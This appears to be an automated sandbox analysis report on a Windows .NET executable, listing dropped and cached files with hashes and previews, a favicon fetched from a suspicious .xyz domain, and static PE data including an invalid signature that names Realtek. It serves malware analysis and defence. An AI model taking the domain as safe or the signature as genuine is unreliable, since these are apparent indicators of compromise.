                                              Preview: lb6uuK1y9j0US0u0slQVtxR0XfIxYVIVIt/oBTfnQqfIX7ba2uI68MNy+03NuaFUzauokUjWiMSjtYsZXb+AMLp1GXZt/ddE0VHZ8K5JFB8ChIPdudwwZZKFmQFEVo1+XFOMTOc/UIGZibW0TI9pWbXv0TZfFvLhjEJbqCCTAyKftQinPTF4c/UyAqpNAQcQUSRltXfs+oqSF98OxNtZS2KIgzNiZtlUbJLVIZk4wsZbOhSKaNHQc2dIP7fL6ov0JLI0MPk6yHT168dkFzu4Eg2u6Ht7Jh8i9n7aPZsj+KIl5cnEAHOS4W9tqbmf7+21/D2dzePi2wQLlYvnngBr1nUejSNkuEExZSFvF5QVcbC707R5PT1Hjv/lWVS1A865eTONgm+dh0JlCi/qZ3iCy2G92Liwt6PGIdKm5H8NIKpglUF4lPsyk6FW3MkvJ5sSAifRmhgKaCvlRLuhEAuI9NoyHdMfhO218mrKWgB4y4+Ez9JrS8tHuGQZ9rnvIrz1ZFzNTShpIM8sUB5pXuEON5z7nPsZ6/YIHMdtmj5zwcIA5jP+5nKRgtstGKBbXUuwtYxhZROATRCf9ez9RzVOvHAisJHxskPHrK/dkXbrdCpIP2q+mRK2dE45++DSMFioDfzdchTQuzbZcbqKaMUDsI670j8tGd7K+HsInZqLAevFYZH/UBWtIIIB+CGljR9TdS0NbupJJAoJRiaFEeWIsnF1Z6Y44cWuYdxS0LgjWJLpgaXkTYPPjAsOa51/AAyv08VhYmnyx8ID4uqyLWDNp2Oq9yE6rU8hVpD60DuZP5FZaTG0v8J4Bmlqb+rAl0BB3fqpHXqUG0Q+TPIkkafsA78KpIdlSeYMt3p8xL05KptnlH1oMYO+8jQYRzPwJHOnWZCgDiACjcz05AqgMXtb+XoYQR6LMcS20oRMdsz7J7ySnvZstKO4LuyYfVxnKdH7K5y6EoXBZ9Mzc93ZIHX95YEP80Dz/l/kOTMYwJn0
                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1]
                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                              Category:downloaded
                                              Size (bytes):4720
                                              Entropy (8bit):5.164796203267696
                                              Encrypted:false
                                              SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                              MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                              SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                              SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                              SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                              Malicious:false
                                              IE Cache URL:res://ieframe.dll/errorPageStrings.js
                                              Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\6tUmvLY[1].htm
                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              File Type:ASCII text, with very long lines, with no line terminators
                                              Category:dropped
                                              Size (bytes):232892
                                              Entropy (8bit):5.999794384299331
                                              Encrypted:false
                                              SSDEEP:6144:nIFOOm/lCwt+UtT0poYFtDGen+Cka4z3xNx7POOtXOCed:nIFOF/h75ooYr7nVka4/JO4+C8
                                              MD5:E67BEC1196B42DDCF081B749F65E9AEA
                                              SHA1:F2608D77DEE635179828DA3A3DFB55679EA3C173
                                              SHA-256:A44F94C2F8C5D548B24E4AE11DCB417E099034D8D936D1031EE90655F3B44948
                                              SHA-512:B2A21051EAC20CC1AD59CE083299DBEE32DBA00412E079AC9A40B0666695A794EC1687482D60156FFBD03718EF14ACDFE0B4730D05B0235AE2563E2DBB8DFC6F
                                              Malicious:false
                                              Preview: cA9R/EkWAaTXfzkeXKYb8OP7bUL2UHCfavK3bEW3fnuX/zp+f/0aMM7HbOhqPz5aO0cHRfLtT5QQaqzJJ4ZNspob5KNn8Gd4BEM2dBkQyXC8Q29eCY8pdIiefS6F1EX2OYiDC/2NyczKZHPOj1Gm0I1xoZageESGyyg4WbjJUSXjmfpGtqHhuzogrhu/rY7xYdBi7AMQkGMBkph/mJEb7bgIUD/cBTkmA2RFakewsCoeKYcsn9vHfrL5xQ2bsFcwA2lDfI1Grv0+GB0XFncdBGLN5trbrpxppqhOOI9Ybds0OXNxk1M+eAJwQXuzTw3JJm78c4/wThwSxR5aeasL434OOAXlydHtWa4FUyER4UxFAhQrOKAn1+sbag+JI/NGpu4XEYpGpXwtGfle+hA1ScItv3hMhyxpwKqOFsL1Irq/WJMjzUPLajv8fxjLiZoGLzp64SPSRupBQVZSdHxxR/OWEsY1E+D0TEGo8lcADRdpkYR48gb6D1We3/rvSfB6SWGXS+tJaWtV12ms+u6OKNLXLU4Ay1BCbPxVd8fJpBOiDQyOMCoHTQGwjNv9r13wtSQvSpK+dQaFIfID5eK0raGBXGju5Xj7D6Jv9TKdw6EatexsdM/YwJ0p71eLx0LUgBiubB5ED5R+OSsv+VMpyjbIhwdCnZ2adMakXc++No0BgkBCHh20b3Acew8iBc9XK1SmPxXXfE6QPtkD1Q79wNx0sWEE04iaX5ky/5zOXlp0F5QFHk7qMfArk8ayKPhhBLht0xhtzDx+6BqCDwMps7qrbpyq1LAd2CPgDhnuTs1gCr10EvFoEfClVETeY/Sm9mcO3VFoxklqMxN4Qt3yEnjYz8n1YfDhjzAEDmtLaQFANprdyPz/YrewoFtrR1m7+I1HasBLadkBiY9XRb1WeVF0m2GcuOxsoIn3MAlkJlzi7H+PFpJWCYV6SLmKR6AFGxfQMWVrjhGQwrgrHO9K9U5CD0VG7dMdNHyQDvZa
                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\NewErrorPageTemplate[1]
                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                              Category:downloaded
                                              Size (bytes):1612
                                              Entropy (8bit):4.869554560514657
                                              Encrypted:false
                                              SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                              MD5:DFEABDE84792228093A5A270352395B6
                                              SHA1:E41258C9576721025926326F76063C2305586F76
                                              SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                              SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                              Malicious:false
                                              IE Cache URL:res://ieframe.dll/NewErrorPageTemplate.css
                                              Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\favicon[1].ico
                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                              Category:downloaded
                                              Size (bytes):5430
                                              Entropy (8bit):4.0126861171462025
                                              Encrypted:false
                                              SSDEEP:96:n0aWBDm5zDlvV2rkG4zuAZMXJFG62q7mQ:nCBy5zZ0IG46AaXJFG6v7m
                                              MD5:F74755B4757448D71FDCB4650A701816
                                              SHA1:0BCBE73D6A198F6E5EBAFA035B734A12809CEFA6
                                              SHA-256:E78286D0F5DFA2C85615D11845D1B29B0BFEC227BC077E74CB1FF98CE8DF4C5A
                                              SHA-512:E0FB5F740D67366106E80CBF22F1DA3CF1D236FE11F469B665236EC8F7C08DEA86C21EC8F8E66FC61493D6A8F4785292CE911D38982DBFA7F5F51DADEBCC8725
                                              Malicious:false
                                              IE Cache URL:http://2q7mfx2.xyz/favicon.ico
                                              Preview: ............ .h...&... .... .........(....... ..... .....@.....................s...s...s...sw..r.......s...s...s...s.......s...s..s...s...s...s...r...s{..s...s#..s...s..r..s..s...s[..s...s...s..s...s...s...s}..s...sW..r..s...sm..sK..sC..sw..s..s...s%..s!..s..s...s...s...sU..s.sY..s...s..s..r#......s...s...s..s...r%..s[..s...s...s..s]..s...r.sS..s...sq..........s...s...s...s...s.......su..s...s.......s...s..s.sA..............s%..s..s#......r...r...s]..........s...s..sk..s...s...........s...s...s]......s...r..s7..........s...s..r...r...s...r...........s...s.......s...s..s7..........s...s..si..s?..s7..s...........s...s.......s...s...rW..........s...s..s...s...s...s...........s...s[..........ss..s...s.......s...s..sm..sI..s;..s.......s!..s..s#......s...s...s..sQ......s...s..s...r...sm..s...r...s...r...s...s...r...s...sQ..s..rK..s...sg..s'..........s...s...s..s...s'..s_..s...s...s...rQ..s..s...sK..r/..s3..sa..s...s...s!..s#..s..s...s...s...s...s...s...sy..
                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]
                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                              Category:downloaded
                                              Size (bytes):12105
                                              Entropy (8bit):5.451485481468043
                                              Encrypted:false
                                              SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                              MD5:9234071287E637F85D721463C488704C
                                              SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                              SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                              SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                              Malicious:false
                                              IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                              Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\dnserror[1]
                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                              Category:downloaded
                                              Size (bytes):2997
                                              Entropy (8bit):4.4885437940628465
                                              Encrypted:false
                                              SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                              MD5:2DC61EB461DA1436F5D22BCE51425660
                                              SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                              SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                              SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                              Malicious:false
                                              IE Cache URL:res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9003
                                              Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\down[1]
                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):748
                                              Entropy (8bit):7.249606135668305
                                              Encrypted:false
                                              SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                              MD5:C4F558C4C8B56858F15C09037CD6625A
                                              SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                              SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                              SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                              Malicious:false
                                              IE Cache URL:res://ieframe.dll/down.png
                                              Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                              C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):89
                                              Entropy (8bit):4.404363038876712
                                              Encrypted:false
                                              SSDEEP:3:oVXU1IGSl5W8JOGXnE1IGSlXun:o9UuG6sqEuG6e
                                              MD5:F7132E2A4581FD2A66ABEC8596CD904F
                                              SHA1:A6B9C948622C9535880FF67064B24D60BBD0CB5B
                                              SHA-256:172BCA8C8E6BF40480AE4800EF3A6C91F45C499E80E30E4743D0F0F362A43C51
                                              SHA-512:B086397C66F1CB4779C65861241BFFCDCE3314BE38AA6759184C3D6486D9C1DA01EF58648ACD7B2FEA4C8B744A195D6846A20A5602FD8F1C479DC00516D80E66
                                              Malicious:false
                                              Preview: [2021/04/12 15:25:07.773] Latest deploy version: ..[2021/04/12 15:25:07.773] 11.211.2 ..
                                              C:\Users\user\AppData\Local\Temp\~DF0DABE26BAA32FB42.TMP
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):12933
                                              Entropy (8bit):0.4119836537037507
                                              Encrypted:false
                                              SSDEEP:24:c9lLh9lLh9lIn9lIn9loksF9lokM9lWk+KaRKI:kBqoIkHkhkFawI
                                              MD5:E7304731218D0A21816902154E3A2862
                                              SHA1:3652095508BF24BF22040BB354D7AE5DB5997C35
                                              SHA-256:DE6D3D72BD433288B6E4FC0A3EF5472E2F3DB44C66F6BE678AEE6CB57B0DB307
                                              SHA-512:34ED0BD457BA81D46A89EAC9EB2BAE0781C15166155E6A942DB9FE871D60C9970127F1F30A943B1FF87BC32424891DC979F6B46FAD33F9A3EBBBBBF82863358C
                                              Malicious:false
                                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\~DF20E1CBD0001D92CD.TMP
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):39697
                                              Entropy (8bit):0.5816249520286889
                                              Encrypted:false
                                              SSDEEP:96:kBqoxKAuvScS+rl3elfHjJUEHjJUUHjJUV:kBqoxKAuqR+rl3elfHjJUEHjJUUHjJUV
                                              MD5:D1CA8C84A39C0131E5F002D81E55E99D
                                              SHA1:4F117FD477FA721888F7AB96CEC30FD10ADAFAC6
                                              SHA-256:07CD6F74BB27322D1E975659A69FB56B1A46D6827FDD432D20D91ED25C508FC3
                                              SHA-512:767C26DDEA4935E3BA343D41A1CA14E7EF7FB9FAA12EC911478651777B6E10A7A470747DECCA5DBAD19073D82074E6AB7224C0B42B35560C55A2598F836BECBD
                                              Malicious:false
                                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\~DF50DA2614C3B543EE.TMP
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):39657
                                              Entropy (8bit):0.5741968145122208
                                              Encrypted:false
                                              SSDEEP:96:kBqoxKAuvScS+NTRwz1iydalIBgiydalIB8iydalIBV:kBqoxKAuqR+NTRwz1iHcgiHc8iHcV
                                              MD5:B79CEA388C876E77DD717E2B99C69E95
                                              SHA1:3474C496DE60A1C287D1FDD69DAC32018A796482
                                              SHA-256:5DB3920463679492559C84D18E95F272019BBECAC7C7528777FE3F4D91B91A9B
                                              SHA-512:CCC83B679F1FA2D0D23BDD79AA4500447EC628E87BA6913AFE9109F735A28BE8C0BC37A0B02A57A8D59E9306142DD564EE56B2008B30680B00E587CBE2EE4E82
                                              Malicious:false
                                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\~DFBEABCA28CF22FEB6.TMP
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):39641
                                              Entropy (8bit):0.5694116611230048
                                              Encrypted:false
                                              SSDEEP:48:kBqoxKAuvScS+iEOnrIrih/tiXIh/tiX8h/tiXV:kBqoxKAuvScS+iEOnUmGXIGX8GXV
                                              MD5:2B13179292292C769EBAD6871EB13664
                                              SHA1:D309B7A9458FB58599BD55F21BFE208574388FC7
                                              SHA-256:B792AC45DFCC7E71416650144D5DE6CB426441650D68344ADA08739789A0B43A
                                              SHA-512:9C50AF6BD96999F994105B3AA54CE41095B1021ED36F191CF888D45560A6604EEB77DD30AEA7A1B7C68C0462CC1952046A79C304EA34A8C5ED8C7DF0E9C91FE2
                                              Malicious:false
                                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\~DFC62B4C23D61BCA78.TMP
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):13269
                                              Entropy (8bit):0.61455347003618
                                              Encrypted:false
                                              SSDEEP:24:c9lLh9lLh9lIn9lIn9loMHF9loMF9lWMwGILbdxazsoZ:kBqoIMOMwMwDLSww
                                              MD5:6760E270CB99A210BAB4DD00A16BF912
                                              SHA1:9D3E1A5CFA4F6CA45C93548F814489737AEC9E55
                                              SHA-256:D2ED9F6E353CA1294C6C036BEC21EC635CC307DF36BC877F0BADF0115F3C5B78
                                              SHA-512:1AA0284E70622F28161DDEF0A65277D781F6B184222F5D48D382EBF4996400AC223C46852179108642230184F66AC21817EAFC10F58B94B55B89EC1EF2D9C13E
                                              Malicious:false
                                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\~DFE8E2529E38BBDC04.TMP
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):39657
                                              Entropy (8bit):0.5751583597524867
                                              Encrypted:false
                                              SSDEEP:96:kBqoxKAuvScS+yU+Xk+z7PvUwoF0gz7PvUwoF08z7PvUwoF0V:kBqoxKAuqR+yU+Xk+nkF0gnkF08nkF0V
                                              MD5:9B186DBB32A4354DDF22BAECDF97D9B3
                                              SHA1:7FF158EED342DD310BABC2169132E7F75456D283
                                              SHA-256:B38E5E4EA9554C1E1A99B6B209C5A5C4A41B297D4180DAECB80D4A5A726BEC07
                                              SHA-512:F47572142C483BB0A7283B99E077E8CE42A02B1379927EF1B1DDB7F2A0AB573A96DD5A971E4A8BF9D82A4A58AAFDDD6DEBDB5EC53F5D500FC9EFF53B70B17684
                                              Malicious:false
                                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.5732728241196945
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                              • Win32 Executable (generic) a (10002005/4) 49.93%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:a.exe
                                              File size:1878352
                                              MD5:6321729b9f33fea55483fbb3792c611b
                                              SHA1:816ad37e36a68f89ab2ca4fea4f83879caeb6586
                                              SHA256:369cfe293c93b001240bdee35859037c7513ceef781c8174938d0650c9e5575d
                                              SHA512:12fed64d4b9eb2e409845f5c681df1427667880374743b1c3c873c72a361b2bf486249286fde6fca881a9c3ce064aea71d36e3c0789fce4f194f98b8e8930f7e
                                              SSDEEP:49152:bYLlc5NGbPDu/xkxyuS2N3Qz0f9qqgdaE5LUSJpYnY/:IIE/u2YuSCQz0VqqadHDYnY/
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H.o`................................. ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:e4e2a1a1a4bcbcfc

                                              Static PE Info

                                              General

                                              Entrypoint:0x4fd01e
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x606F0C48 [Thu Apr 8 13:59:36 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Authenticode Signature

                                              Signature Valid:false
                                              Signature Issuer:CN=DigiCert EV Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                                              Signature Validation Error:The digital signature of the object did not verify
                                              Error Number:-2146869232
                                              Not Before, Not After
                                              • 6/12/2016 5:00:00 PM 1/24/2019 4:00:00 AM
                                              Subject Chain
                                              • CN=Realtek Semiconductor Corp., O=Realtek Semiconductor Corp., L=Hsinchu, S=Taiwan, C=TW, PostalCode=300, STREET="No. 2, Innovation Road II, Hsinchu Science Park", SERIALNUMBER=22671299, OID.1.3.6.1.4.1.311.60.2.1.3=TW, OID.2.5.4.15=Private Organization
                                              Version:3
                                              Thumbprint MD5:7B0CA4029E3A73373CE0BD3DF12A08C1
                                              Thumbprint SHA-1:37A0BACB152A547382195095AB33601929877364
                                              Thumbprint SHA-256:B08CF4E204D1BA2BA8642D7709499D61CFF8CF7AA75CCD832A6BA1D7F1B82DF7
                                              Serial:0320BE3EB866526927F999B97B04346E

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xfcfd00x4b.text
